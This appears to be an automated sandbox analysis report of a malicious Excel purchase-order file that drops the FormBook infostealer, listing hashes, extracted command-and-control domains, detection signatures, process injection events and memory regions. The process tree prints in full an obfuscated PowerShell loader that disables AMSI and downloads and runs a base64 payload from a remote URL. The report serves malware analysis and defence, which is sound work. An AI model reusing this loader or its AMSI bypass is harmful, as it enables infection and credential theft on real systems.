Analysis
-
max time kernel
147s -
max time network
140s -
platform
windows7_x64 -
resource
win7v20210410 -
submitted
23-07-2021 17:05
Static task
static1
Behavioral task
behavioral1
Sample
PO20210723.xlsx
Resource
win7v20210410
Behavioral task
behavioral2
Sample
PO20210723.xlsx
Resource
win10v20210408
General
-
Target
PO20210723.xlsx
-
Size
1.2MB
-
MD5
13481df252e0eed6eea3f219a47d42f3
-
SHA1
916c441582321287167e51f987ae719d75892ae8
-
SHA256
b78a8643cd8001537207ddfaa47ac46e68a7d5c38d2b1eb1a1ca216101152eb9
-
SHA512
e51dcac2395e751f4cb99014097c3e6b235a46d4a4b24d68e9191282583b5bd64854aff0d4078c13676b034b540c76b24e652d08efad8dfe1bc71808ba4681e7
Malware Config
Extracted
formbook
4.1
http://www.howmucharemyrarecoinsworth.com/jn7g/
mojketering.com
signinsimple.com
theartclouds.com
xmartmanagement.com
akademisantri.com
knitsu.com
funeralhomeswarrensburgil.com
formatohd.xyz
ortetiles.com
myeduhubs.com
twinpiques.com
itpaystobefashionable.com
3drinkminimum.com
wanpoo1.com
crystalclearlifecoachingcc.com
dronerealestate.net
langers.email
konstela.com
enteratecondanielvelasquez.com
graceinhomeschoolchaos.com
wanxin1.com
comma-la.store
egedenportreler.com
foslandlawfirm.site
oarange.xyz
mellatt.xyz
helgrooup.com
cartucce-toner.com
lalucacreative.com
salivasolve.com
hughesconsulting.agency
sundowntownthemovie.com
sacredsexacademy.com
riseandgrindcle.com
wildflowervtg.com
bienchezvous.net
alterduosrl.online
3jsgj.com
cleanwarrenton.com
redpenguy.com
undiscri.club
austincitytexas.com
terrenutra.com
lvbaoshan.com
tallercolombo.com
applicableturnout.club
arboledacoaching.com
stevewinchmusic.com
benandsara.com
denlasvegas.com
pragocoptertour.com
cyvape.com
alicehollywood.com
jokysun.com
856380176.xyz
umamipost.com
cod16.com
negociosconvictortorres.com
wabizo.net
46thpresidentofusa.com
timer-pooh.com
trademarkrates.com
transemmiconductor.com
groovepafes.com
Signatures
-
suricata: ET MALWARE FormBook CnC Checkin (GET)
-
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
-
Formbook Payload 3 IoCs
Processes:
resource yara_rule behavioral1/memory/2028-88-0x0000000000400000-0x000000000042E000-memory.dmp formbook behavioral1/memory/2028-89-0x000000000041EBD0-mapping.dmp formbook behavioral1/memory/1756-96-0x00000000000D0000-0x00000000000FE000-memory.dmp formbook -
Blocklisted process makes network request 3 IoCs
Processes:
EQNEDT32.EXEPowershell.exeflow pid process 6 1960 EQNEDT32.EXE 10 752 Powershell.exe 12 752 Powershell.exe -
Downloads MZ/PE file
-
Executes dropped EXE 1 IoCs
Processes:
vbc.exepid process 684 vbc.exe -
Loads dropped DLL 2 IoCs
Processes:
EQNEDT32.EXEpid process 1960 EQNEDT32.EXE 1960 EQNEDT32.EXE -
Uses the VBS compiler for execution 1 TTPs
-
Drops file in System32 directory 1 IoCs
Processes:
Powershell.exedescription ioc process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk Powershell.exe -
Suspicious use of SetThreadContext 3 IoCs
Processes:
Powershell.execalc.exemsdt.exedescription pid process target process PID 752 set thread context of 2028 752 Powershell.exe calc.exe PID 2028 set thread context of 1260 2028 calc.exe Explorer.EXE PID 1756 set thread context of 1260 1756 msdt.exe Explorer.EXE -
Enumerates system info in registry 2 TTPs 1 IoCs
Processes:
EXCEL.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor EXCEL.EXE -
Launches Equation Editor 1 TTPs 1 IoCs
Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.
-
Processes:
EXCEL.EXEdescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105" EXCEL.EXE Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel EXCEL.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1" EXCEL.EXE Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Toolbar EXCEL.EXE Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt EXCEL.EXE Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote EXCEL.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55" EXCEL.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000" EXCEL.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes" EXCEL.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
EXCEL.EXEpid process 1888 EXCEL.EXE -
Suspicious behavior: EnumeratesProcesses 39 IoCs
Processes:
Powershell.execalc.exemsdt.exepid process 752 Powershell.exe 752 Powershell.exe 752 Powershell.exe 752 Powershell.exe 752 Powershell.exe 752 Powershell.exe 752 Powershell.exe 752 Powershell.exe 752 Powershell.exe 752 Powershell.exe 752 Powershell.exe 752 Powershell.exe 752 Powershell.exe 2028 calc.exe 2028 calc.exe 1756 msdt.exe 1756 msdt.exe 1756 msdt.exe 1756 msdt.exe 1756 msdt.exe 1756 msdt.exe 1756 msdt.exe 1756 msdt.exe 1756 msdt.exe 1756 msdt.exe 1756 msdt.exe 1756 msdt.exe 1756 msdt.exe 1756 msdt.exe 1756 msdt.exe 1756 msdt.exe 1756 msdt.exe 1756 msdt.exe 1756 msdt.exe 1756 msdt.exe 1756 msdt.exe 1756 msdt.exe 1756 msdt.exe 1756 msdt.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
Explorer.EXEpid process 1260 Explorer.EXE -
Suspicious behavior: MapViewOfSection 5 IoCs
Processes:
calc.exemsdt.exepid process 2028 calc.exe 2028 calc.exe 2028 calc.exe 1756 msdt.exe 1756 msdt.exe -
Suspicious use of AdjustPrivilegeToken 45 IoCs
Processes:
Powershell.execalc.exemsdt.exeExplorer.EXEdescription pid process Token: SeDebugPrivilege 752 Powershell.exe Token: SeIncreaseQuotaPrivilege 752 Powershell.exe Token: SeSecurityPrivilege 752 Powershell.exe Token: SeTakeOwnershipPrivilege 752 Powershell.exe Token: SeLoadDriverPrivilege 752 Powershell.exe Token: SeSystemProfilePrivilege 752 Powershell.exe Token: SeSystemtimePrivilege 752 Powershell.exe Token: SeProfSingleProcessPrivilege 752 Powershell.exe Token: SeIncBasePriorityPrivilege 752 Powershell.exe Token: SeCreatePagefilePrivilege 752 Powershell.exe Token: SeBackupPrivilege 752 Powershell.exe Token: SeRestorePrivilege 752 Powershell.exe Token: SeShutdownPrivilege 752 Powershell.exe Token: SeDebugPrivilege 752 Powershell.exe Token: SeSystemEnvironmentPrivilege 752 Powershell.exe Token: SeRemoteShutdownPrivilege 752 Powershell.exe Token: SeUndockPrivilege 752 Powershell.exe Token: SeManageVolumePrivilege 752 Powershell.exe Token: 33 752 Powershell.exe Token: 34 752 Powershell.exe Token: 35 752 Powershell.exe Token: SeIncreaseQuotaPrivilege 752 Powershell.exe Token: SeSecurityPrivilege 752 Powershell.exe Token: SeTakeOwnershipPrivilege 752 Powershell.exe Token: SeLoadDriverPrivilege 752 Powershell.exe Token: SeSystemProfilePrivilege 752 Powershell.exe Token: SeSystemtimePrivilege 752 Powershell.exe Token: SeProfSingleProcessPrivilege 752 Powershell.exe Token: SeIncBasePriorityPrivilege 752 Powershell.exe Token: SeCreatePagefilePrivilege 752 Powershell.exe Token: SeBackupPrivilege 752 Powershell.exe Token: SeRestorePrivilege 752 Powershell.exe Token: SeShutdownPrivilege 752 Powershell.exe Token: SeDebugPrivilege 752 Powershell.exe Token: SeSystemEnvironmentPrivilege 752 Powershell.exe Token: SeRemoteShutdownPrivilege 752 Powershell.exe Token: SeUndockPrivilege 752 Powershell.exe Token: SeManageVolumePrivilege 752 Powershell.exe Token: 33 752 Powershell.exe Token: 34 752 Powershell.exe Token: 35 752 Powershell.exe Token: SeDebugPrivilege 2028 calc.exe Token: SeDebugPrivilege 1756 msdt.exe Token: SeShutdownPrivilege 1260 Explorer.EXE Token: SeShutdownPrivilege 1260 Explorer.EXE -
Suspicious use of FindShellTrayWindow 4 IoCs
Processes:
Explorer.EXEpid process 1260 Explorer.EXE 1260 Explorer.EXE 1260 Explorer.EXE 1260 Explorer.EXE -
Suspicious use of SendNotifyMessage 4 IoCs
Processes:
Explorer.EXEpid process 1260 Explorer.EXE 1260 Explorer.EXE 1260 Explorer.EXE 1260 Explorer.EXE -
Suspicious use of SetWindowsHookEx 7 IoCs
Processes:
EXCEL.EXEpid process 1888 EXCEL.EXE 1888 EXCEL.EXE 1888 EXCEL.EXE 1888 EXCEL.EXE 1888 EXCEL.EXE 1888 EXCEL.EXE 1888 EXCEL.EXE -
Suspicious use of WriteProcessMemory 34 IoCs
Processes:
EQNEDT32.EXEvbc.exePowershell.exeExplorer.EXEmsdt.exedescription pid process target process PID 1960 wrote to memory of 684 1960 EQNEDT32.EXE vbc.exe PID 1960 wrote to memory of 684 1960 EQNEDT32.EXE vbc.exe PID 1960 wrote to memory of 684 1960 EQNEDT32.EXE vbc.exe PID 1960 wrote to memory of 684 1960 EQNEDT32.EXE vbc.exe PID 684 wrote to memory of 752 684 vbc.exe Powershell.exe PID 684 wrote to memory of 752 684 vbc.exe Powershell.exe PID 684 wrote to memory of 752 684 vbc.exe Powershell.exe PID 752 wrote to memory of 1064 752 Powershell.exe calc.exe PID 752 wrote to memory of 1064 752 Powershell.exe calc.exe PID 752 wrote to memory of 1064 752 Powershell.exe calc.exe PID 752 wrote to memory of 1064 752 Powershell.exe calc.exe PID 752 wrote to memory of 1544 752 Powershell.exe calc.exe PID 752 wrote to memory of 1544 752 Powershell.exe calc.exe PID 752 wrote to memory of 1544 752 Powershell.exe calc.exe PID 752 wrote to memory of 1544 752 Powershell.exe calc.exe PID 752 wrote to memory of 1152 752 Powershell.exe calc.exe PID 752 wrote to memory of 1152 752 Powershell.exe calc.exe PID 752 wrote to memory of 1152 752 Powershell.exe calc.exe PID 752 wrote to memory of 1152 752 Powershell.exe calc.exe PID 752 wrote to memory of 2028 752 Powershell.exe calc.exe PID 752 wrote to memory of 2028 752 Powershell.exe calc.exe PID 752 wrote to memory of 2028 752 Powershell.exe calc.exe PID 752 wrote to memory of 2028 752 Powershell.exe calc.exe PID 752 wrote to memory of 2028 752 Powershell.exe calc.exe PID 752 wrote to memory of 2028 752 Powershell.exe calc.exe PID 752 wrote to memory of 2028 752 Powershell.exe calc.exe PID 1260 wrote to memory of 1756 1260 Explorer.EXE msdt.exe PID 1260 wrote to memory of 1756 1260 Explorer.EXE msdt.exe PID 1260 wrote to memory of 1756 1260 Explorer.EXE msdt.exe PID 1260 wrote to memory of 1756 1260 Explorer.EXE msdt.exe PID 1756 wrote to memory of 1784 1756 msdt.exe cmd.exe PID 1756 wrote to memory of 1784 1756 msdt.exe cmd.exe PID 1756 wrote to memory of 1784 1756 msdt.exe cmd.exe PID 1756 wrote to memory of 1784 1756 msdt.exe cmd.exe
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\PO20210723.xlsx2⤵
- Enumerates system info in registry
- Modifies Internet Explorer settings
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\msdt.exe"C:\Windows\SysWOW64\msdt.exe"2⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe/c del "C:\WINDOWS\syswow64\calc.exe"3⤵
-
C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding1⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Launches Equation Editor
- Suspicious use of WriteProcessMemory
-
C:\Users\Public\vbc.exe"C:\Users\Public\vbc.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exePowershell $8B0111F552=[Ref].Assembly.GetType('Sy'+'stem.'+'Mana'+'gem'+'ent'+'.Autom'+'atio'+'n.A'+'m'+'si'+'Utils');$835FFE1926='4456625220575263174452554847';$9FE0AD5C66=[string](0..13|%{[char][int](53+($835FFE1926).substring(($_*2),2))})-replace ' ';$58FB808063=$8B0111F552.GetField($9FE0AD5C66,'Non^^^'.replace('^^^','Pub')+'lic,S'+'tatic');$58FB808063.SetValue($null,$true);($A72F9B815A=$A72F9B815A=Write-Host 'EC4AAB5808223EB722F9C2063ED056665AA80AC5658F9D06815720759C3EB4C4B7065724C3DEFA63DEB58FC3FA9D22121674');$76545677866555677886556778657=@(91,82,101,102,93,46,65,115,115,101,109,98,108,121,46,71,101,116,84,121,112,101,40,39,83,121,39,43,39,115,116,101,109,46,39,43,39,77,97,110,97,39,43,39,103,101,109,39,43,39,101,110,116,39,43,39,46,65,117,116,111,109,39,43,39,97,116,105,111,39,43,39,110,46,39,43,36,40,91,67,72,65,114,93,40,57,56,45,51,51,41,43,91,99,72,65,114,93,40,49,50,52,45,49,53,41,43,91,99,104,65,82,93,40,49,49,53,41,43,91,67,72,97,82,93,40,91,66,89,116,101,93,48,120,54,57,41,41,43,39,85,116,105,108,115,39,41,46,71,101,116,70,105,101,108,100,40,36,40,91,67,104,65,114,93,40,91,98,121,116,101,93,48,120,54,49,41,43,91,99,104,97,82,93,40,91,98,89,116,69,93,48,120,54,68,41,43,91,99,104,97,114,93,40,91,98,121,84,101,93,48,120,55,51,41,43,91,99,104,65,114,93,40,49,49,48,45,53,41,43,91,99,104,65,82,93,40,91,66,89,84,69,93,48,120,52,57,41,43,91,99,72,97,82,93,40,57,54,56,48,47,56,56,41,43,91,99,72,97,82,93,40,49,48,53,41,43,91,67,104,97,114,93,40,91,98,89,116,101,93,48,120,55,52,41,43,91,67,104,97,114,93,40,91,66,89,84,69,93,48,120,52,54,41,43,91,99,104,97,114,93,40,49,52,56,45,53,49,41,43,91,99,72,65,82,93,40,57,53,53,53,47,57,49,41,43,91,67,104,65,82,93,40,49,48,56,41,43,91,67,104,65,114,93,40,54,50,54,50,47,54,50,41,43,91,67,104,65,82,93,40,91,98,89,84,69,93,48,120,54,52,41,41,44,39,78,111,110,80,117,98,108,105,99,44,83,116,97,116,105,99,39,41,46,83,101,116,86,97,108,117,101,40,36,110,117,108,108,44,36,116,114,117,101,41,59,40,36,68,48,48,70,57,70,49,85,67,54,61,36,68,48,48,70,57,70,49,85,67,54,61,87,114,105,116,101,45,72,111,115,116,32,39,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,53,67,66,48,50,65,53,50,65,48,56,49,56,51,48,54,50,65,54,70,65,65,65,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,53,67,66,48,50,65,53,50,65,48,56,49,56,51,48,54,50,65,54,70,65,65,65,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,39,41,59,100,111,32,123,36,112,105,110,103,32,61,32,116,101,115,116,45,99,111,110,110,101,99,116,105,111,110,32,45,99,111,109,112,32,103,111,111,103,108,101,46,99,111,109,32,45,99,111,117,110,116,32,49,32,45,81,117,105,101,116,125,32,117,110,116,105,108,32,40,36,112,105,110,103,41,59,36,66,48,50,65,53,50,65,48,56,49,32,61,32,91,69,110,117,109,93,58,58,84,111,79,98,106,101,99,116,40,91,83,121,115,116,101,109,46,78,101,116,46,83,101,99,117,114,105,116,121,80,114,111,116,111,99,111,108,84,121,112,101,93,44,32,51,48,55,50,41,59,91,83,121,115,116,101,109,46,78,101,116,46,83,101,114,118,105,99,101,80,111,105,110,116,77,97,110,97,103,101,114,93,58,58,83,101,99,117,114,105,116,121,80,114,111,116,111,99,111,108,32,61,32,36,66,48,50,65,53,50,65,48,56,49,59,36,65,68,48,48,70,57,70,49,85,67,61,32,78,101,119,45,79,98,106,101,99,116,32,45,67,111,109,32,77,105,99,114,111,115,111,102,116,46,88,77,76,72,84,84,80,59,36,65,68,48,48,70,57,70,49,85,67,46,111,112,101,110,40,39,71,69,84,39,44,39,104,116,116,112,115,58,47,47,99,100,110,46,100,105,115,99,111,114,100,97,112,112,46,99,111,109,47,97,116,116,97,99,104,109,101,110,116,115,47,56,53,56,55,57,51,51,50,50,48,56,55,55,49,48,55,53,51,47,56,54,51,56,57,56,49,51,54,56,53,52,48,48,51,55,50,50,47,109,101,46,106,112,103,39,44,36,102,97,108,115,101,41,59,36,65,68,48,48,70,57,70,49,85,67,46,115,101,110,100,40,41,59,36,54,55,52,69,49,54,53,67,56,51,61,91,84,101,120,116,46,69,110,99,111,100,105,110,103,93,58,58,39,85,84,70,56,39,46,39,71,101,116,83,116,114,105,110,103,39,40,91,67,111,110,118,101,114,116,93,58,58,39,70,114,111,109,66,97,115,101,54,52,83,116,114,105,110,103,39,40,36,65,68,48,48,70,57,70,49,85,67,46,114,101,115,112,111,110,115,101,84,101,120,116,41,41,124,73,96,69,96,88);[System.Text.Encoding]::ASCII.GetString($76545677866555677886556778657)|I`E`X3⤵
- Blocklisted process makes network request
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\WINDOWS\syswow64\calc.exe"{path}"4⤵
-
C:\WINDOWS\syswow64\calc.exe"{path}"4⤵
-
C:\WINDOWS\syswow64\calc.exe"{path}"4⤵
-
C:\WINDOWS\syswow64\calc.exe"{path}"4⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Public\vbc.exeMD5
06daa4f472383226392964c70e34c376
SHA1b47a3554b0bf7250caa0f84090fb387cb332f31b
SHA25651c392870e9f21df2154b4e68a901ca1b5d9fccdcf00a4e6fa60ef07b4dfc541
SHA5129f220bc3f4c097d582f2958e57255e862f1b67191c6409ea0199a1c9ce3bd57830f7d9cd86c38925b7c61d744a77cbd51d2b59ffee9f66d57e0ee2a4ab654dee
-
\Users\Public\vbc.exeMD5
06daa4f472383226392964c70e34c376
SHA1b47a3554b0bf7250caa0f84090fb387cb332f31b
SHA25651c392870e9f21df2154b4e68a901ca1b5d9fccdcf00a4e6fa60ef07b4dfc541
SHA5129f220bc3f4c097d582f2958e57255e862f1b67191c6409ea0199a1c9ce3bd57830f7d9cd86c38925b7c61d744a77cbd51d2b59ffee9f66d57e0ee2a4ab654dee
-
\Users\Public\vbc.exeMD5
06daa4f472383226392964c70e34c376
SHA1b47a3554b0bf7250caa0f84090fb387cb332f31b
SHA25651c392870e9f21df2154b4e68a901ca1b5d9fccdcf00a4e6fa60ef07b4dfc541
SHA5129f220bc3f4c097d582f2958e57255e862f1b67191c6409ea0199a1c9ce3bd57830f7d9cd86c38925b7c61d744a77cbd51d2b59ffee9f66d57e0ee2a4ab654dee
-
memory/684-65-0x0000000000000000-mapping.dmp
-
memory/752-71-0x0000000002530000-0x0000000002531000-memory.dmpFilesize
4KB
-
memory/752-73-0x0000000002760000-0x0000000002761000-memory.dmpFilesize
4KB
-
memory/752-85-0x000000001B490000-0x000000001B491000-memory.dmpFilesize
4KB
-
memory/752-86-0x000000001AB6A000-0x000000001AB89000-memory.dmpFilesize
124KB
-
memory/752-67-0x0000000000000000-mapping.dmp
-
memory/752-68-0x000007FEFB571000-0x000007FEFB573000-memory.dmpFilesize
8KB
-
memory/752-69-0x00000000024E0000-0x00000000024E1000-memory.dmpFilesize
4KB
-
memory/752-70-0x000000001ABE0000-0x000000001ABE1000-memory.dmpFilesize
4KB
-
memory/752-84-0x000000001B770000-0x000000001B771000-memory.dmpFilesize
4KB
-
memory/752-87-0x000000001C7A0000-0x000000001C7FA000-memory.dmpFilesize
360KB
-
memory/752-72-0x000000001AB60000-0x000000001AB62000-memory.dmpFilesize
8KB
-
memory/752-74-0x000000001AB64000-0x000000001AB66000-memory.dmpFilesize
8KB
-
memory/1260-92-0x0000000004CA0000-0x0000000004D6C000-memory.dmpFilesize
816KB
-
memory/1260-100-0x0000000004F70000-0x00000000050CD000-memory.dmpFilesize
1.4MB
-
memory/1756-96-0x00000000000D0000-0x00000000000FE000-memory.dmpFilesize
184KB
-
memory/1756-95-0x0000000000300000-0x00000000003F4000-memory.dmpFilesize
976KB
-
memory/1756-93-0x0000000000000000-mapping.dmp
-
memory/1756-98-0x0000000002300000-0x0000000002603000-memory.dmpFilesize
3.0MB
-
memory/1756-99-0x0000000002070000-0x0000000002103000-memory.dmpFilesize
588KB
-
memory/1784-97-0x0000000000000000-mapping.dmp
-
memory/1888-77-0x0000000005FF0000-0x0000000006C3A000-memory.dmpFilesize
12.3MB
-
memory/1888-75-0x0000000005FF0000-0x0000000006C3A000-memory.dmpFilesize
12.3MB
-
memory/1888-81-0x00000000055F0000-0x00000000055F2000-memory.dmpFilesize
8KB
-
memory/1888-82-0x0000000005FF0000-0x0000000006C3A000-memory.dmpFilesize
12.3MB
-
memory/1888-80-0x0000000005FF0000-0x0000000006C3A000-memory.dmpFilesize
12.3MB
-
memory/1888-101-0x000000005FFF0000-0x0000000060000000-memory.dmpFilesize
64KB
-
memory/1888-60-0x0000000070E21000-0x0000000070E23000-memory.dmpFilesize
8KB
-
memory/1888-61-0x000000005FFF0000-0x0000000060000000-memory.dmpFilesize
64KB
-
memory/1888-83-0x0000000005FF0000-0x0000000006C3A000-memory.dmpFilesize
12.3MB
-
memory/1888-59-0x000000002F121000-0x000000002F124000-memory.dmpFilesize
12KB
-
memory/1888-76-0x0000000005FF0000-0x0000000006C3A000-memory.dmpFilesize
12.3MB
-
memory/1888-79-0x0000000005FF0000-0x0000000006C3A000-memory.dmpFilesize
12.3MB
-
memory/1888-78-0x0000000005FF0000-0x0000000006C3A000-memory.dmpFilesize
12.3MB
-
memory/1960-62-0x0000000075161000-0x0000000075163000-memory.dmpFilesize
8KB
-
memory/2028-91-0x00000000001D0000-0x00000000001E4000-memory.dmpFilesize
80KB
-
memory/2028-90-0x0000000000A20000-0x0000000000D23000-memory.dmpFilesize
3.0MB
-
memory/2028-89-0x000000000041EBD0-mapping.dmp
-
memory/2028-88-0x0000000000400000-0x000000000042E000-memory.dmpFilesize
184KB